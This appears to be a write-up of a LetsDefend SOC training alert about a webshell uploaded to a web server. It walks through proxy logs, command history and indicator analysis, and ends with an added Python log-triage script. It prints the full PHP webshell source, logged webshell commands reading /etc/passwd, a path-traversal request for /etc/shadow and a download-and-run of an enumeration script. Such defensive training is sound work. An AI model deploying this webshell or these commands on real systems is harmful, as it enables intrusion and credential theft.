LetsDefend level 1 alert SOC128 - Malicious File Upload Attempt event-id 62
Details
EventID: 62
Event Time: Feb. 22, 2021, 4:31 p.m.
Rule: SOC128 - Malicious File Upload Attempt
Level: Security Analyst
Source Address: 172.16.20.4
Source Hostname: gitServer
File Name: phpshell.php
File Hash: 756215a64e7d43153298f1a5a5fde295
File Size: 113.00 B
Device Action: Allowed
Download (Password: infected): 756215a64e7d43153298f1a5a5fde295.zip
Playbook
Define Threat Indicator
Answer: Other
Check if the malware is quarantined/cleaned
Log Management
Two accesses to phpshell.php after the alert.

| # | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
|---|---|---|---|---|---|---|
| 359 | Feb 22, 2021, 04:32 PM | Proxy | 49.234.71.65 | 42212 | 172.16.20.4 | 80 |
| 360 | Feb 22, 2021, 04:33 PM | Proxy | 49.234.71.65 | 42212 | 172.16.20.4 | 80 |

359 Raw Log: Request URL: 172.16.20.4/srcCode/phpshell.php?cmd=whoami Request Method: GET Device Action: Allowed
360 Raw Log: Request URL: 172.16.20.4/srcCode/phpshell.php?cmd=cat /etc/passwd Request Method: GET Device Action: Allowed
WoW
Endpoint Management
CMD History:
2020-10-19 17:10: pwd
2020-10-19 17:12: ls
2020-10-19 18:12: wget -h
2020-10-19 21:54: wget https://raw.githubusercontent.com/django/django/master/setup.py
2020-10-19 21:55: cd
2021-02-13 16:47: wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -o /tmp/ah22idah.sh
2021-02-13 16:48: clear
2021-02-13 16:49: chmod +x /tmp/ah22idah.sh
2021-02-13 16:50: ./tmp/ah22idah.sh
2021-02-22 16:32: whoami
2021-02-22 16:33: cat /etc/passwd
Information gathering on the machine with LinEnum.sh......
Answer: Not Quarantined
Analyze Malware
Definitely malicious, but let's verify.
phpshell.php
VirusTotal:https://www.virustotal.com/gui/file/f1c5bed9560a1afe9d5575e923e480e7e8030e10bc3d7c0d842b1a64f49f8794
```php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
```
It is a simple webshell: whatever arrives in the cmd parameter is passed straight to system().
49.234.71.65
VirusTotal: https://www.virustotal.com/gui/ip-address/49.234.71.65
ip-sc: https://ip-sc.net/ja/r/49.234.71.65
AbuseIPDB: https://www.abuseipdb.com/check/49.234.71.65
Apparently known for SSH brute-forcing and the like.
Answer: Malicious
Check If Someone Requested the C2
| # | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
|---|---|---|---|---|---|---|
| 358 | Feb 22, 2021, 04:31 PM | Proxy | 49.234.71.65 | 42212 | 172.16.20.4 | 80 |
| 359 | Feb 22, 2021, 04:32 PM | Proxy | 49.234.71.65 | 42212 | 172.16.20.4 | 80 |
| 360 | Feb 22, 2021, 04:33 PM | Proxy | 49.234.71.65 | 42212 | 172.16.20.4 | 80 |
| 361 | Feb 21, 2021, 07:57 PM | Proxy | 49.234.71.65 | 33212 | 172.16.20.4 | 80 |
| 362 | Feb 21, 2021, 05:02 PM | Proxy | 172.16.20.4 | 80 | 49.234.71.65 | 33212 |
| 363 | Feb 21, 2021, 05:02 PM | Proxy | 49.234.71.65 | 33212 | 172.16.20.4 | 80 |
| 364 | Feb 21, 2021, 05:02 PM | Proxy | 172.16.20.4 | 80 | 49.234.71.65 | 33212 |
Even more accesses confirmed.

358 Raw Log: Request URL: 172.16.20.4/srcCode/upload.php Request Method: GET Device Action: Allowed
The webshell was uploaded through the upload form.

361 Raw Log: Request URL: https://amesiana.com/ Request Method: GET
A mis-logged entry?

362 Raw Log: Response Code: 404
Perhaps they tried to make the server download something and it failed.

363 Raw Log: Request URL: 172.16.20.4/srcCode/show.php?page=../../../../../../../etc/shadow Request Method: GET
Whether this succeeded is unknown.

364 Raw Log: Response Code: 404
Another failed download, perhaps.

Answer: Accessed
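As an added example (not part of the original writeup or of LetsDefend), the checks applied by hand to the raw proxy logs above, turned into a small Python triage script: the log lines are constructed to match this alert's entries, and the webshell parameter names and sensitive-file list are assumed watch lists, not something the page provides.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines modelled on the raw proxy entries in this writeup.
RAW_LOGS = [
    "358 Request URL: 172.16.20.4/srcCode/upload.php Request Method: GET Device Action: Allowed",
    "359 Request URL: 172.16.20.4/srcCode/phpshell.php?cmd=whoami Request Method: GET Device Action: Allowed",
    "360 Request URL: 172.16.20.4/srcCode/phpshell.php?cmd=cat /etc/passwd Request Method: GET Device Action: Allowed",
    "361 Request URL: https://amesiana.com/ Request Method: GET",
    "363 Request URL: 172.16.20.4/srcCode/show.php?page=../../../../../../../etc/shadow Request Method: GET",
]
# Lazy URL group: logged URLs can contain unencoded spaces ("cat /etc/passwd"), so the
# URL is everything before the optional "Request Method:" / "Device Action:" fields.
LOG_RE = re.compile(r"^(?P<id>\d+)\s+Request URL:\s+(?P<url>.+?)"
                    r"(?:\s+Request Method:\s+(?P<method>\w+))?(?:\s+Device Action:\s+\w+)?$")
# Assumed watch lists (not from the page): common one-line webshell parameter names and
# files a web application should never be asked to read.
SHELL_PARAMS = {"cmd", "command", "exec"}
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow")
TRAVERSAL = re.compile(r"\.\.[/\\]")

def parse_entry(line):
    """Split one raw proxy line into id, host, path, parsed query and method."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = m.group("url")
    if "://" not in url:  # internal requests are logged without a scheme
        url = "http://" + url
    u = urlsplit(url)
    return {"id": m.group("id"), "host": u.hostname, "path": u.path,
            "query": parse_qs(u.query), "method": m.group("method")}

def classify(entry):
    """Return detection labels for one parsed entry; an empty list means nothing suspicious."""
    findings = []
    for name, values in entry["query"].items():
        for value in values:  # parse_qs has already percent-decoded each value
            if name.lower() in SHELL_PARAMS:
                findings.append(f"webshell command execution: {name}={value}")
            if TRAVERSAL.search(value):
                findings.append(f"path traversal: {name}={value}")
            if any(f in value for f in SENSITIVE_FILES):
                findings.append(f"sensitive file reference: {name}={value}")
    return findings

def triage(lines):
    """Map log id to findings for every line that produced at least one detection."""
    entries = filter(None, map(parse_entry, lines))
    return {e["id"]: hits for e in entries if (hits := classify(e))}
```

Run over the five constructed lines it flags 359, 360 and 363 and leaves the upload-form hit and the external request untouched, which mirrors the manual walk-through above.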
Containment
Containment!
Add Artifacts
| Value | Type | Comment |
|---|---|---|
| 756215a64e7d43153298f1a5a5fde295 | MD5 Hash | webshell |
| 49.234.71.65 | IP Address | C2 server |